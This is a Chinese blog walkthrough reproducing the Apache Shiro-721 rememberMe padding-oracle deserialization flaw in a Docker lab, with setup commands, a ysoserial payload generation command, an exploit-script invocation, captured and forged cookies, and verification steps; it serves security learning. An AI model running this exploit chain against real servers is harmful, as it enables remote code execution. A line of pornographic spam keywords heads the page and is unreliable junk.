国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Shiro歷史漏洞復(fù)現(xiàn) - Shiro-721

這篇具有很好參考價值的文章主要介紹了Shiro歷史漏洞復(fù)現(xiàn) - Shiro-721。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

漏洞原理

Shiro rememberMe 反序列化遠(yuǎn)程代碼執(zhí)行漏洞

由于 Apache Shiro cookie 中通過 AES-128-CBC 模式加密的 rememberMe 字段存 在問題,用戶可通過 Padding Oracle 加密生成的攻擊代碼來構(gòu)造惡意的 rememberMe 字段,并重新請求網(wǎng)站,進(jìn)行反序列化攻擊,最終導(dǎo)致任意代碼執(zhí)行

rememberMe cookie 通過 AES-128-CBC 模式加密,易受到 Padding Oracle 攻擊??梢酝ㄟ^結(jié)合有效的 rememberMe cookie 作為 Padding Oracle 攻擊的前綴,然后精?制作 rememberMe 來進(jìn)?反序列化攻擊。

Tip:在1.2.4版本后,shiro已經(jīng)更換 AES-CBC 為 AES-GCM ,無法再通過 Padding Oracle 遍歷 key 。

影響版本

Apache Shiro <= 1.4.1(需要一個合法的登錄賬號,基于Padding Oracle attack來實現(xiàn)的攻擊)

參考鏈接:https://www.jianshu.com/p/833582b2f560

特征判斷

由于漏洞利用需要一個合法的登錄賬號,這里利用賬號正常登陸獲取一個有效的rememberMe cookie ,并記錄下這個rememberMe的值

環(huán)境搭建

Docker基礎(chǔ)操作

docker pull vulfocus/shiro-721

docker run -d -p 8080:8080 vulfocus/shiro-721

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

訪問靶場地址,即可搭建成功

http://192.168.88.130:8080/login.jsp

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

漏洞復(fù)現(xiàn)

使用正確的用戶和密碼,勾選rememberMe,使用burp代理,獲取返回的rememberMe值。

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

認(rèn)證成功則不會設(shè)置deleteMe的cookie

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

認(rèn)證失敗時會設(shè)置 deleteMe 的 cookie

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

deleteMe 的 cookie

bVZT3bzgT/0t714w/WmYr3EP081Z0qO7gaUMGC90GK/R019JeYL+64UgucSB8COn6jlzV10THzZP0okwQ/Fs75d2XAvhepUV8RxgSWhFEWQLNq4nXw1ESgbiAQb9KyMd/nwgT9goYuMOERIbNA6Ay5AWRtuLvEaRmSTYPwxampXbnG2JlSXms45L6uqM2ek4X3y6ZSiZM80XbZUyXdOBP+EN8TuRhO+bS8N8jEWaj/uAtNZY8m94m11/SIPk1nBGfGzpcU3WIbT4R3feHaOkCHYLTuLxif1q6rItx5eICS5q8B4qVrTESf2XCFgaGp2FxlZ18AjpTOF4gwQ7cLEM7L49BhvxpAlj4w0GMOuyk27OKdUIh3+RK5qT7Dgp3fGWbEZrqyu6MCAG0TmKY2vKE1peLRNEAuQJapRU/FCVcSfSolxIMHSHb/WzBpcLehOC5Jslb5hekliouggjfNfTV6fSuvz1hLIfix2IiRwmiM/ns3xAVVsBwOc+1SxLqpt2

使用ysoserial工具生成payload

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/1" >
payload.class

#"touch /tmp/1" 在tmp目錄寫入1

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

使用剛才burp獲取到的deleteMe cookie值作為prefix,加載Payload,進(jìn)行Padding Oracle攻擊

腳本鏈接:https://github.com/wuppp/shiro_rce_exp

python shiro_exp.py http://192.168.88.130:8080 [rememberMeCookie] payload.class

python2 shiro_exp.py http://192.168.88.130:8080 bVZT3bzgT/0t714w/WmYr3EP081Z0qO7gaUMGC90GK/R019JeYL+64UgucSB8COn6jlzV10THzZP0okwQ/Fs75d2XAvhepUV8RxgSWhFEWQLNq4nXw1ESgbiAQb9KyMd/nwgT9goYuMOERIbNA6Ay5AWRtuLvEaRmSTYPwxampXbnG2JlSXms45L6uqM2ek4X3y6ZSiZM80XbZUyXdOBP+EN8TuRhO+bS8N8jEWaj/uAtNZY8m94m11/SIPk1nBGfGzpcU3WIbT4R3feHaOkCHYLTuLxif1q6rItx5eICS5q8B4qVrTESf2XCFgaGp2FxlZ18AjpTOF4gwQ7cLEM7L49BhvxpAlj4w0GMOuyk27OKdUIh3+RK5qT7Dgp3fGWbEZrqyu6MCAG0TmKY2vKE1peLRNEAuQJapRU/FCVcSfSolxIMHSHb/WzBpcLehOC5Jslb5hekliouggjfNfTV6fSuvz1hLIfix2IiRwmiM/ns3xAVVsBwOc+1SxLqpt2 payload.class
Usage: shiro_exp.py <url> <somecookie value> <payload>

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

中間需要很長時間

爆破成功,返回了rememberMe cookies的值

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

6ug1zz4BAzMfEGfqrLBO34ZfOOFO0Ucw/ocfmVCcPBdK2rQmjzPdMczCUTDsYz2M2Fbvq4zYKW4ffu8uBOqWdkyf1RmCM0LdoVLUMqTmqcdxPS0S9noRnrPEtb8UjxyWAXnZQGyEhIF3svbLkcEQIOKk+4ER3rE+6v4pq0JeEELL03FfrMfm8LudHC/FqxDuacnZv1pA2gRJguVe7Y/bSVxqqAli/TT4Cz9i6rbFl6MQSkIsXfa9UZI/wcSgH3CswahR5vF4fgm5Apr7k8hA/DqI8EqqKJQgqp+RuzmYCcMsw5/I4DDr1O7M3Nx16k7AVobuvauJDNC9r2yngVWxzSlk8fBVr6G2Jc+kNRJE1k68EhlHjTAFcV9LDzVK7rVOJmOkK+iJOwxi1T2i8bCV1fPB0bHJ2JifbtKXt1P3aQHdbZ6FbpL+2AbLYekZvwYDeOWrkxoWESRgdV3RwhMmwazgiZ1Pi5jrqhTYYeAdsEwNsmDJvkbsXBgyMmDbwE3E/rFKHEFyQD0bT54CP6UvAwgKH4dlK9fZQwMAL1iOWOxp+G/3U67RBxjzNLZ2UhG3yinc3ay4j1iQQfHh+9csRCNkLcwYwELkc8IW8OqOa1IQ0doQz0U+eEXz8vVWRKB09B263x9KUlxFkjctG/7WAAFTn2kv1kOe/lmWqZOOWbwbkhTGfi/X4rodZ0wbxBChonp7CWGeDDwDOhDWQePZaxgZ0ySEFE56NE/YkHl4l0Y2BlbDcPj7URgl+eAtQae8GZE9q+/UUrdSreH2AsON4E1WDJFzZRTn5yp5fBhJ7MZvWCFRyDISdU5kq5NIboG2VCHoud3zF0Cv5kygVfRrP7qa/83YprxQABqnrMZsxVxrLshK9VfzP1QXQ+copmNdtwZF/4n5p1ry/AYTs1qYYebc0X9l0KA9e9iLej/PMCQdrG8cTiwoBeZ5oxGK4aIc2mEGmH6xU4Y6PCXWda18Ux6LDEF7Zo5baBq4Wedn3+fW0sZAAUY1aPTMjQ+evgornrtU3mt2Zl3W9nor385RUHaOV6DSuw+rFW7zoeIyKVVjWXH7DDq14/EuFdao3lJd3pNkzRI1aeWEdNEyL+eysi8q2wR12pnMZthoiXIENBvDSYwdR/NXUob24TteBoMmC0DH3scFaIO+r2qoRMigg5ZJvuMLcKoDMKWrfTiv/jDIdo/lNwSgmhGSrHFKmpxC2D1P98iCzBU5VrH/AbipzhLKKFo6uczwxwRAauu/ityKgYYqsuHf7MqS+6yNDLoc5iPAD4gZ92+MEeIqq9/NdFy3DrcZ0bNK/FpUAT5T1oAnP3PcaZOseD+9e8JZJavOm+xsqv/0zly92Q3Fk6A9UNtVMXljS2fUWU1If6LTcCFQ26IHIfKIjxqGaB+1gEMeGcvuLBZ4lAaE2/yhRa4kswAAAAAAAAAAAAAAAAAAAAA=

訪問靶場地址用burp抓包,添加上面爆破出來的remeberMe值

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

去靶場服務(wù)器查看 /tmp 目錄下是否創(chuàng)建了 1 的文件

docker exec -it 035 /bin/bash

shiro721復(fù)現(xiàn),漏洞復(fù)現(xiàn),安全,web安全,shiro漏洞,滲透測試,java

漏洞利用成功!文章來源地址http://www.zghlxwxcb.cn/news/detail-692055.html

到了這里,關(guān)于Shiro歷史漏洞復(fù)現(xiàn) - Shiro-721的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Shiro 550與721漏洞的不同

    Apache Shiro框架進(jìn)行登錄,服務(wù)端在接收cookie時,會經(jīng)過下面的流程: 1、檢索RememberMe Cookie的值 2、Base64解碼 3、AES解密(加密密鑰硬編碼) 4、進(jìn)行 反序列化 操作(未過濾處理) 5、攻擊者可以使用Shiro的 默認(rèn)密鑰構(gòu)造惡意序列化對象 進(jìn)行編碼來偽造用戶的Cookie,服務(wù)端反序

    2024年01月17日
    瀏覽(88)
  • 漏洞復(fù)現(xiàn)——shiro反序列化

    漏洞復(fù)現(xiàn)——shiro反序列化

    今天咱們的主角是shiro反序列化命令執(zhí)行漏洞。該漏洞在HVV等大型攻防項目中,經(jīng)常被作為突破口。簡單介紹了解一下還是很有必要的。廢話不多說,進(jìn)入正題。 一、漏洞描述: Apache Shiro是美國阿帕奇(Apache)軟件基金會的一套用于執(zhí)行認(rèn)證、授權(quán)、加密和會話管理的Java安

    2024年02月09日
    瀏覽(25)
  • Shiro框架漏洞分析與復(fù)現(xiàn)

    Shiro框架漏洞分析與復(fù)現(xiàn)

    Shiro簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權(quán)、密碼學(xué)和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性,可以快速輕松地保護(hù)任何應(yīng)用程序——從最小的移動應(yīng)用程序到最大的 Web 和企業(yè)應(yīng)用程序。 1、Shiro反序列化漏洞(CVE-2016-4437,Shiro-550)

    2024年02月17日
    瀏覽(21)
  • shiro漏洞復(fù)現(xiàn)及其攻擊流量分析

    shiro漏洞復(fù)現(xiàn)及其攻擊流量分析

    最近面試時經(jīng)常被問到,每次說的都不太完美,現(xiàn)在再來復(fù)現(xiàn)一邊。 Apache Shiro是一個開源安全框架,提供身份驗證、授權(quán)、密碼學(xué)和會話管理。 利用vulhub搭建的靶場。 在Apache Shiro = 1.2.4版本中存在反序列化漏洞。 該漏洞成因在于,Shiro的“記住我”功能是設(shè)置cookie中的reme

    2024年02月06日
    瀏覽(18)
  • 漏洞復(fù)現(xiàn) | Apache Shiro 授權(quán)繞過漏洞(CVE-2022-32532)

    漏洞復(fù)現(xiàn) | Apache Shiro 授權(quán)繞過漏洞(CVE-2022-32532)

    0x00 漏洞描述 ????????Apache Shiro 是一套用于執(zhí)行認(rèn)證、授權(quán)、加密和會話管理的 Java 安全框架。2022年06月29日 APache 官方發(fā)布了一則關(guān)于 Apache Shiro 的安全通告,Apache Shiro 1.9.1 前的版本 RegExPatternMatcher 在使用帶有 “.” 的正則時,可能會導(dǎo)致權(quán)限繞過。漏洞源于 RegExPatter

    2024年02月02日
    瀏覽(36)
  • shiro反序列化漏洞學(xué)習(xí)(工具+原理+復(fù)現(xiàn))

    shiro反序列化漏洞學(xué)習(xí)(工具+原理+復(fù)現(xiàn))

    工具準(zhǔn)備 1.java8 C:Program FilesJava 2.冰蝎 C:UsersaliDesktoptoolsBehinder_v4.0.6 3.shiro反序列化 圖形化工具 shiro attack2.2 C:UsersaliDesktoptoolsshiro_attack_2.2 4.shiro反序列化 命令行工具 C:UsersaliDesktoptoolsshiro_tool.jar 一.Shiro-550 CVE-2016-4437 序列化: 在Java中,把Java對象轉(zhuǎn)換為字節(jié)序列(

    2023年04月08日
    瀏覽(23)
  • 框架漏洞-CVE復(fù)現(xiàn)-Apache Shiro+Apache Solr

    框架漏洞-CVE復(fù)現(xiàn)-Apache Shiro+Apache Solr

    什么是框架? ?????? 就是別人寫好包裝起來的一套工具,把你原先必須要寫的,必須要做的一些復(fù)雜的東西都寫好了放在那里,你只要調(diào)用他的方法,就可以實現(xiàn)一些本來要費好大勁的功能。 ???????? 如果網(wǎng)站的功能是采用框架開發(fā)的,那么挖掘功能的漏洞就相當(dāng)于

    2024年02月16日
    瀏覽(19)
  • web滲透測試漏洞復(fù)現(xiàn):Elasticsearch未授權(quán)漏洞復(fù)現(xiàn)

    Elasticsearch 是一款 Java 編寫的企業(yè)級搜索服務(wù),它以分布式多用戶能力和全文搜索引擎為特點,采用 RESTful web 接口。這款搜索引擎由 Java 開發(fā),作為 Apache 許可下的開源軟件發(fā)布,是流行的企業(yè)級搜索引擎之一。Elasticsearch 的增刪改查操作都通過 http 接口完成。開源的版本可能

    2024年04月10日
    瀏覽(27)
  • shiro550反序列化漏洞原理與漏洞復(fù)現(xiàn)(基于vulhub,保姆級的詳細(xì)教程)

    shiro550反序列化漏洞原理與漏洞復(fù)現(xiàn)(基于vulhub,保姆級的詳細(xì)教程)

    本文所有使用的腳本和工具都會在文末給出鏈接,希望讀者可以耐心看到最后。 啥是shiro? Shiro是Apache的一個強大且易用的Java安全框架,用于執(zhí)行身份驗證、授權(quán)、密碼和會話管理。使用 Shiro 易于理解的 API,可以快速輕松地對應(yīng)用程序進(jìn)行保護(hù)。 shiro550反序列化原理 cve編號:

    2024年02月05日
    瀏覽(29)
  • 第六十四天 服務(wù)攻防-框架安全&CVE復(fù)現(xiàn)Apache shiro&Apache Solr

    第六十四天 服務(wù)攻防-框架安全&CVE復(fù)現(xiàn)Apache shiro&Apache Solr

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic.JBoos,WebSphere, Jenkins,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring, Flask,jQuery等 1、開發(fā)框架-PHP-Laravel-Thinkphp 2、開發(fā)框架-Javaweb-St2-Spring 3.開發(fā)框架-Python-django-Flask 4、開發(fā)框架-Javascript-Node.js-JQuery 5、其他框架Java-Apache Sh

    2024年02月21日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包